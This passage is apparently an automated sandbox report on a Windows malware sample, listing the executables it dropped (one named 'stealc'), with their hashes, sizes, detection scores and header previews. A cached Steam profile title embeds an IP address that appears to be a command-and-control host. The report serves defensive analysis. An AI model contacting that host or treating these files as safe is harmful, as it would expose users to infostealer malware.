SHA-256:	733765A1599E02C53826A4AE984426862AA714D8B67F889607153888D40BBD75
SHA-512:	B35CFE36A1A40123FDC8A5E7C804096FF33F070F40CBA5812B98F46857F30BA2CE6F86E1B5D20F9B6D00D6A8194B8FA36C27A0208C7886512877058872277963
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\66ae9cc050ded_file0308[1].exe

Download File

Process:	C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	746496
Entropy (8bit):	7.574840010352023
Encrypted:	false
SSDEEP:	12288:koywWrwlTyC9yR+xBP4wMpAuhjH8/Hl19KKjNgzqE0CM6EpJMwk:PlTX9Xj4w+hbM1/g2kM
MD5:	D7528CD33B73718B5949277420681F90
SHA1:	61D97F8DA20FF2995890CE5F2C8A2C9E6E51C078
SHA-256:	3B8D07693E296AEE36E7607C71503D981396A21B367E169146AFDD052CDCF4D1
SHA-512:	B3DAB709E19A2A8BAD92B259EA1739AD55564F6FE31E9F4E502B6280AE6C70CDF5A0F1FDA208887DA4BBCF9213986E2038ABE6A09DC2940998DF08D82E87D474
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 87%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%K..vK..vK..v..^vJ..vU.LvU..vU.]v[..vU.Kv/..vlz.vN..vK..v>..vU.BvJ..vU.\vJ..vU.YvJ..vRichK..v........PE..L.....Ie.................l..........u.............@.................................._..........................................<.......................................................................@............................................text...7k.......l.................. ..`.rdata..4".......$...p..............@..@.data...(#..........................@....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\66b623c3b1dcb_Mowdiewart[1].exe

Download File

Process:	C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	529408
Entropy (8bit):	6.8395911848628215
Encrypted:	false
SSDEEP:	6144:NMovNCQsumdw5sK+5Zo6dpMDWI8Ua69Wipob:S0Nydw5s306dpM/CCpo
MD5:	B8D875D94FBD7DF91B1DBBBC308A057F
SHA1:	517CC89E653FA1A90DA8ED5FB5E5068673F43589
SHA-256:	B950BA1E7368756512FB9C1C8210E4282B3705AB3A7FE1E134C01B397905A674
SHA-512:	127AC147D6C0A0DC130D92E20DB83591C040AF5931578623A0CA61F7A3F495B0E3B9FB83C0F81E81AD7E53E6775BC9C7EADE5D8272F96C5B28D15986FB92E9D2
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 83%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...5.K...............0..............g... ...@....@.. ....................................@.................................Hg..O....@.......................`......,g............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\armadegon[1].exe

Download File

Process:	C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	964096
Entropy (8bit):	6.7500511544674495
Encrypted:	false
SSDEEP:	12288:pX8RkdnkRZOwECM98hfcunLIYCx28xur5GbYkpMalQBEnxSSraaoKZ2A:SRPRAqM98qCRCxnx7YpauBML
MD5:	F5B93D3369D1AE23D6E150E75D2B6A80
SHA1:	6F6914770748AD148154E1576D9C6FE6887F2290
SHA-256:	343EA56746B6F08C7ECCBFBB9FE1A544952A9A933140C677179F4F8C7BB60B81
SHA-512:	DCEDAED2DF62386B980CC1957F224FC48224AEB0F5BF8D0241ACC7A0A552B0AE90697ED333189963540F8391CBECFA0977A8685723C5025C9A4F95918032CF1E
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 75%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....n~W................................. ........@.. ....................... ............`.................................P...K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H..........tF..............................................................J........_.................E...h........=...1..4%..b............................fi..Ih..Hl......(....o..b....A..ci...[..K.......%........$.......c..Q#.......\|...i..........`....%...]..........RW..O...1....].......Z...c..T................I..J&..Mg......x.......6\......H...7..................../..A9..x...........7.......@...~...........X...y^..E...9...4[..om..$....x...X......xV..;...............O...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\66b24859611ad_agent_3[1].exe

Download File

Process:	C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe
File Type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	3097600
Entropy (8bit):	6.278586127519849
Encrypted:	false
SSDEEP:	49152:u2LuWAXniueagRswaRfZ/G+eUmOpw80D:uWta28AOpw
MD5:	BA027CCB7DE0F4A3769F48136D183DBD
SHA1:	A7CDD10733D1064A143001DE087F0565AE116E0B
SHA-256:	4CB86D1B9775321A7F8ED4F751E3ECE271402E0BE07070F72E68DF038877DC8E
SHA-512:	331B6311E44E74D0EB4DF9718F0DFB9E79453ECA26677C53E8E6BC76F2A3633ECBE60119AB07702A9ECE7747D86ABFD6D6201081F21E59920D2CA48D6436A7F8
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 83%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.........+..................6......@.............@...........................0...............................................-.r....................................................................................................................text...-...........................`..`.data....j.......6..................@.../4...........@.........................B/18..........P.........................B/30.........0 ........................B/43...........!......T ................B/59.....$2...."..4...2!................B/75.....7.....#......f"................B/94.....Q,....#......h"................B/106.....a... -..b....+................B.idata..r.....-.......+.............@....symtab..F....-..H....+................B................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\76561199751190313[1].htm

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (3070), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	34730
Entropy (8bit):	5.399937467800467
Encrypted:	false
SSDEEP:	768:4dpqm+0Ih3tAA9CWG4efcDAETBv++nIjBtPF5zfJkPVoEAdLTBv++nIjBtPF5x2g:4d8m+0Ih3tAA9CWG4eFETBv++nIjBtPE
MD5:	1125328E648574DAF6E303E14B3A3C95
SHA1:	6455C671B0CA3D48F48B9B7B242A752EF8FE5BDE
SHA-256:	DD1B002D4E8F6F18E94ADD72986B2F8432988EC0599608512C6F3372B84E0C5E
SHA-512:	C9A9113C9ED4DE0B03C18FDCD0D3E088C9964A99D175774978F4AF88F0ACDAB45ADB64983620FF97175A7D17A1582066036B40C6A10055399FC7BEE6378D67AB
Malicious:	false
Preview:	<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: ir3@ https://78.46.239.218\|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=_D2Bg4UEaFxK&l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english" rel="stylesheet" type="text/css" >.<link hre

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\66b5b75106ac6_stealc[1].exe

Download File

Process:	C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	6332416
Entropy (8bit):	7.016290675256673
Encrypted:	false
SSDEEP:	98304:whGngB5QYShcGyafbzArMRYELUzbf9sdA:whGngBuiGZzAgR1L0bf
MD5:	67D39F0CBBAB44B99FFFAF3A408B2088
SHA1:	AB84D55834C956A7904DB0061A9FE145A6E9C783
SHA-256:	E7AD5000FCAB4B69737E7B206F7EA0FBEEB7F68443E983E924E2710B54C7E5D4
SHA-512:	B5EF2C31E80527BF5715DB45CB859D79B16AE4361657298173DD666290D14CE3F04E366EF203F00663964C815FA101EF4A42036669412C67AC4DAA020F4FAAB4
Malicious:	true
Yara Hits:	Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\66b5b75106ac6_stealc[1].exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 38%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...>..f..................^.........n.^.. ....^...@.. ........................a...........@................................. .^.K....._.......................`.......^.............................................. ............... ..H............text...t.^.. ....^................. ..`.sdata........^.......^.............@....rsrc........._.......^.............@..@.reloc........`.......`.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\66b5d9d3adbaa_defaultr[1].exe

Download File

Process:	C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	11649536
Entropy (8bit):	7.614439394899636
Encrypted:	false
SSDEEP:	196608:uq5Uz55kDba3q4c1X2usHfdV5bvMzeO/FmwuAf0+OTZ5l3:ur55kPa3qEbHfdVRvI50wnVOj
MD5:	45C0D8BEDD6BFF145CBE1C3064F2CF56
SHA1:	5A68F160BDE8531F0B38ED8F9C6B19B7E615A905
SHA-256:	B8A5EF9EA9FA588907A197DB55C743559460190AA58B227DB10D6BE75D8BFE39
SHA-512:	3963ADECB4EE013B54C926328FE0D6576D291DCAE0EAD3F675C38DDB51B2747E0469179FA4903E3237FE2BEEA7079F67DA377F3787B3BD4DDBA8694102AF0703
Malicious:	true
Yara Hits:	Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\66b5d9d3adbaa_defaultr[1].exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 62%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l.f.....................6.......... ........@.. .......................@............@.....................................K........................... ......<................................................ ............... ..H............text....... ...................... ..`.sdata..............................@....rsrc...........0..................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\66b45c742e0a1_123p[1].exe

Download File

Process:	C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	10590720
Entropy (8bit):	7.970373644459469
Encrypted:	false
SSDEEP:	196608:V+Zh8TZ4EwkJcPAyxxycUgqToe0ERIdBxZC7dmmvYGW8Jv:jrhutxSgWPcxZCJNL
MD5:	488D85695B6E76307AA595F8DB6A48FC
SHA1:	63F7682DD687A55D1AE0000B242C06CF334A7534
SHA-256:	433CED4F31E8BFB3F0C02FE88255D4FC109C8BC2F4D8BD51EAE700CFF631D191
SHA-512:	B106C3E8153F5A974C5751BB44A4056E33C185FDB825293A4F583E9BAAD0C168B43A67A20BA4474885D7DBC4F4CA75C7896378C61D95399C739FDCCE204EF9C1
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 67%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....\.f..........#.................O`V........@.............................P............ ..................................................=W.<....@......@...`*............................................].(.......8............... ............................text...v~.......................... ..`.rdata..............................@..@.data...............................@....pdata..............................@..@.00cfg..............................@..@.tls................................@....text0..S.%......................... ..`.text1..X...........................@....text2..............................`..h.rsrc........@......................@..@........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\66b5ac1092454_otraba[1].exe

Download File

Process:	C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	6753792
Entropy (8bit):	7.044891159590778
Encrypted:	false
SSDEEP:	98304:b4SlKWywcBysE28E894v+YgrgpwrOnlZ9FBUFw:bjlKW2oO+k+YjpsalZ9F6C
MD5:	F46974F39AEBF4F4D039600F3881D6B6
SHA1:	0B39ED9E6F02BD36930DA303933DF76A48320701
SHA-256:	022845DBD0B028F17D257923279A9ADCDE5C7E4024F219059E0682C3825B7EAE
SHA-512:	01CA6F8B8DF34BA18A83521276078286F09B237BD7821011486DE4161FC1F036FFF864D407AB1865353458BDE334284F7D8FE9DDC81C57F03A7386E55347B796
Malicious:	true
Yara Hits:	Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\66b5ac1092454_otraba[1].exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.................pd...........d.. ....d...@.. ........................g...........@.................................`.d.K.....d......................`g.......d.............................................. ............... ..H............text....od.. ...pd................. ..`.sdata........d......td.............@....rsrc.........d......xd.............@..@.reloc.......`g.......g.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\setup[1].exe

Download File

Process:	C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	7644814
Entropy (8bit):	7.996970553263378
Encrypted:	true
SSDEEP:	196608:91OOAkEMWXUyZ885H/0EQhxmwiF1+nSYrsmLSIy0ZjemTmDf:3OOPERXUF8/QDZc+4EpemTmr
MD5:	381F228FC02E9927F1F2145B8AD5696E
SHA1:	3960552CA6E2A13449435F78DFA3CD1EA7373242
SHA-256:	B31A9DC0594789DD914B37E7AB868E93C8178A3EAEB11457F476FD9C5CD0098F
SHA-512:	F0F99306209C54E1C2472D0A0E3135525578F57B775B013D93BBEA4A476B7C8A78792B25C9A54AF8BEAF35C3C862861E36523A34619258957B35575AD3981F3D
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........W..s...s...s...}...s...y..s...,...s...r.!.s.......s...x..s.......s.......s.^.u...s.Rich..s.........PE..L....S.L.............................K............@.............................................................................d....p..`............................................................................................................text.............................. ..`.rdata...D.......F..................@..@.data...HZ.......2..................@....sxdata......`......................@....rsrc...`....p......................@..@................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\7zS80C5.tmp\Install.exe

Download File

Process:	C:\Users\user\Documents\piratemamm\9SPLMMrYRskiaGUcrT9MofKl.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6690042
Entropy (8bit):	7.996151775370936
Encrypted:	true
SSDEEP:	196608:91O7bD7t4XC6ktbBZzBll8NfHew3d+FWn925Qxn:3O7DTdhBZvWsodGIk5Kn
MD5:	2679FAC73DF5510DE7D16E88EDD0EE31
SHA1:	9E302B760C3C97B45E525C82C9D8963512F499E8
SHA-256:	307385A7FBC1AF07541CA6E800C0B42292EE7E3CA8D06F5029347693504EAB26
SHA-512:	21BC76F26D7DC8F582D4C9C9F60FFFDE3D74CFBFBAC8FDCB5423A2A329E50EFB4464784887B10396D9C99F5AD86CABEA61F81F5AD8CAAEA7A3894DD64259AA71
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........W..s...s...s...}...s...y..s...,...s...r.!.s.......s...x..s.......s.......s.^.u...s.Rich..s.........PE..L....S.L.............................K............@.............................................................................d....p..`............................................................................................................text.............................. ..`.rdata...D.......F..................@..@.data...HZ.......2..................@....sxdata......`......................@....rsrc...`....p......................@..@................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\7zS80C5.tmp\data\config.txt

Download File

Process:	C:\Users\user\Documents\piratemamm\9SPLMMrYRskiaGUcrT9MofKl.exe
File Type:	data
Category:	dropped
Size (bytes):	787999
Entropy (8bit):	7.999751249027363
Encrypted:	true
SSDEEP:	12288:0F8jtjPrsD9A9E3MfQCfg7zxU7eL1y37rIs7P85WqBSZOozBwSxHHeBeuiz:DsDeE3MnfAFU7eE3nYWqUZO2iSx5z
MD5:	3544C594296B4EBCEFAA82180692D471
SHA1:	7BFE5ED611B7DC45D658F363527375A1E7E7B8B6
SHA-256:	160AFCB978AB8586D240EE8A4961F50DF0664DFE2FE18C647FC01DC21798BBA3
SHA-512:	9E0A17106D5671AFF880392B88602EF74F14F38CE3D3D6FCC5D8A730B78096C649DE16179F9B75C415DC861B038DBAEFB0A3C2CFD28BF049329C3B9DB5FDF2E0
Malicious:	false
Preview:	..X......?.]........cl..Ro(....S.5piE..\|..O.z<....s.Ou..e....z......?.^I.L.o..u..w.=..=..%....j.$.$)3......j..d...&.@1.x.e..._'8.O.....n.S.T~.='.......G.Pjr...)...E..YS.......sz.C...B....PE._A.~8\|#."..f..-..!..A\./O..H4D.CnZ".z...T...y.."...t....-..N&b.\.;..."..A...4g.D[z(....#.+.1..B$.-K.+gB..#.A.w......!..oXhy.....Eu]..n.s......K..Rj..:c..+....I...,.3.}.......0........X.8D.e....E..r..U>...)a\|.V.7/"h....&...V..+r..ZqA$.2.bm[..l......R..l+............W.R.S?gy8..:.!!}.X.{........>.].j). ...R.WLE.inI..q...o..j...(..bf...?...2"..A.......8H....w.'.Kp...3.9.."tL....S..H7..H.$.<u..~.\3.._....\..Q..;.1qGqQ....w..;.9.dF......F.Tc..On....(G....+iH.7.r..fc.E.G.+.P.._Sr.#%t....?.!.N]a.@.`{~lH..Q...G....f...wC.M8.l.+.-.H..2/..........3;..F%g.%..G.. ....I..1.o...0..D..c..h..)....:..Y{.,0..C":..-:.p.......{_.b.zq..7......R....fHL.a......R.Pv.6.{(,Ro....ySH.G.\.T..Lq.^..@.g..l..e......D...l....(...na...[..Nz`~.>.b.i$...-^........s.......

C:\Users\user\AppData\Local\Temp\7zS918E.tmp\Install.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\7zS80C5.tmp\Install.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	7031296
Entropy (8bit):	7.756104468662649
Encrypted:	false
SSDEEP:	98304:GiVWx6I2LGL7527pxEbvdjzcC9EW13/bOPvs96qYqivsQhp6EXZrvJk:GiVWV2yLKcFvcAEC3zT8qwp
MD5:	83D1F62BB73920D3D4603BE2EEAB0192
SHA1:	87F16B4FC7D7494B871410B7D9ABD7CCE6685D5D
SHA-256:	082C2C15F0BC4C1CAE76C805C6539AB97C787D0A48235045F9BDA6A18EF6C628
SHA-512:	9E684E88C3F99B93AAD012C572AAD56EA3CA5CCD8E93516ED542C7657BB2B083A3D815965512B6E78DF6470166862AFC03693ECBD0FC52085FC8F15EC469F8E8
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5Z.8q;.kq;.kq;.k\|i.kS;.k\|i:k.;.k\|i;k.;.k...k~;.kq;.kG:.k.>kw;.k..kp;.kRichq;.k........................PE..L....2.a.....................v`.....H........0....@...........................k.......l...@..................................4k.......k.Y....................`k..@..................................8.j.@............0k..............................text............................... ..`.data....._..0...._.................@....idata.......0k.. ....j.............@..@.BtHO...]....Pk.......j.............@....reloc...@...`k..B....j.............@..B.rsrc...Y.....k......>k.............@..@........................................................................................................................................................................................................................................................................................

C:\Users\user\Documents\piratemamm\9SPLMMrYRskiaGUcrT9MofKl.exe

Download File

Process:	C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	7644814
Entropy (8bit):	7.996970553263378
Encrypted:	true
SSDEEP:	196608:91OOAkEMWXUyZ885H/0EQhxmwiF1+nSYrsmLSIy0ZjemTmDf:3OOPERXUF8/QDZc+4EpemTmr
MD5:	381F228FC02E9927F1F2145B8AD5696E
SHA1:	3960552CA6E2A13449435F78DFA3CD1EA7373242
SHA-256:	B31A9DC0594789DD914B37E7AB868E93C8178A3EAEB11457F476FD9C5CD0098F
SHA-512:	F0F99306209C54E1C2472D0A0E3135525578F57B775B013D93BBEA4A476B7C8A78792B25C9A54AF8BEAF35C3C862861E36523A34619258957B35575AD3981F3D
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........W..s...s...s...}...s...y..s...,...s...r.!.s.......s...x..s.......s.......s.^.u...s.Rich..s.........PE..L....S.L.............................K............@.............................................................................d....p..`............................................................................................................text.............................. ..`.rdata...D.......F..................@..@.data...HZ.......2..................@....sxdata......`......................@....rsrc...`....p......................@..@................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Documents\piratemamm\Dc25WcfSyV8lvRa9ThM7DR04.exe

Download File

Process:	C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	6332416
Entropy (8bit):	7.016290675256673
Encrypted:	false
SSDEEP:	98304:whGngB5QYShcGyafbzArMRYELUzbf9sdA:whGngBuiGZzAgR1L0bf
MD5:	67D39F0CBBAB44B99FFFAF3A408B2088
SHA1:	AB84D55834C956A7904DB0061A9FE145A6E9C783
SHA-256:	E7AD5000FCAB4B69737E7B206F7EA0FBEEB7F68443E983E924E2710B54C7E5D4
SHA-512:	B5EF2C31E80527BF5715DB45CB859D79B16AE4361657298173DD666290D14CE3F04E366EF203F00663964C815FA101EF4A42036669412C67AC4DAA020F4FAAB4
Malicious:	true
Yara Hits:	Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\Documents\piratemamm\Dc25WcfSyV8lvRa9ThM7DR04.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 38%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...>..f..................^.........n.^.. ....^...@.. ........................a...........@................................. .^.K....._.......................`.......^.............................................. ............... ..H............text...t.^.. ....^................. ..`.sdata........^.......^.............@....rsrc........._.......^.............@..@.reloc........`.......`.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe

Download File

Process:	C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	6753792
Entropy (8bit):	7.044891159590778
Encrypted:	false
SSDEEP:	98304:b4SlKWywcBysE28E894v+YgrgpwrOnlZ9FBUFw:bjlKW2oO+k+YjpsalZ9F6C
MD5:	F46974F39AEBF4F4D039600F3881D6B6
SHA1:	0B39ED9E6F02BD36930DA303933DF76A48320701
SHA-256:	022845DBD0B028F17D257923279A9ADCDE5C7E4024F219059E0682C3825B7EAE
SHA-512:	01CA6F8B8DF34BA18A83521276078286F09B237BD7821011486DE4161FC1F036FFF864D407AB1865353458BDE334284F7D8FE9DDC81C57F03A7386E55347B796
Malicious:	true
Yara Hits:	Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.................pd...........d.. ....d...@.. ........................g...........@.................................`.d.K.....d......................`g.......d.............................................. ............... ..H............text....od.. ...pd................. ..`.sdata........d......td.............@....rsrc.........d......xd.............@..@.reloc.......`g.......g.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe

Download File

Process:	C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	746496
Entropy (8bit):	7.574840010352023
Encrypted:	false
SSDEEP:	12288:koywWrwlTyC9yR+xBP4wMpAuhjH8/Hl19KKjNgzqE0CM6EpJMwk:PlTX9Xj4w+hbM1/g2kM
MD5:	D7528CD33B73718B5949277420681F90
SHA1:	61D97F8DA20FF2995890CE5F2C8A2C9E6E51C078
SHA-256:	3B8D07693E296AEE36E7607C71503D981396A21B367E169146AFDD052CDCF4D1
SHA-512:	B3DAB709E19A2A8BAD92B259EA1739AD55564F6FE31E9F4E502B6280AE6C70CDF5A0F1FDA208887DA4BBCF9213986E2038ABE6A09DC2940998DF08D82E87D474
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 87%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%K..vK..vK..v..^vJ..vU.LvU..vU.]v[..vU.Kv/..vlz.vN..vK..v>..vU.BvJ..vU.\vJ..vU.YvJ..vRichK..v........PE..L.....Ie.................l..........u.............@.................................._..........................................<.......................................................................@............................................text...7k.......l.................. ..`.rdata..4".......$...p..............@..@.data...(#..........................@....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe

Download File

Process:	C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	11649536
Entropy (8bit):	7.614439394899636
Encrypted:	false
SSDEEP:	196608:uq5Uz55kDba3q4c1X2usHfdV5bvMzeO/FmwuAf0+OTZ5l3:ur55kPa3qEbHfdVRvI50wnVOj
MD5:	45C0D8BEDD6BFF145CBE1C3064F2CF56
SHA1:	5A68F160BDE8531F0B38ED8F9C6B19B7E615A905
SHA-256:	B8A5EF9EA9FA588907A197DB55C743559460190AA58B227DB10D6BE75D8BFE39
SHA-512:	3963ADECB4EE013B54C926328FE0D6576D291DCAE0EAD3F675C38DDB51B2747E0469179FA4903E3237FE2BEEA7079F67DA377F3787B3BD4DDBA8694102AF0703
Malicious:	true
Yara Hits:	Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 62%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l.f.....................6.......... ........@.. .......................@............@.....................................K........................... ......<................................................ ............... ..H............text....... ...................... ..`.sdata..............................@....rsrc...........0..................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe

Download File

Process:	C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe
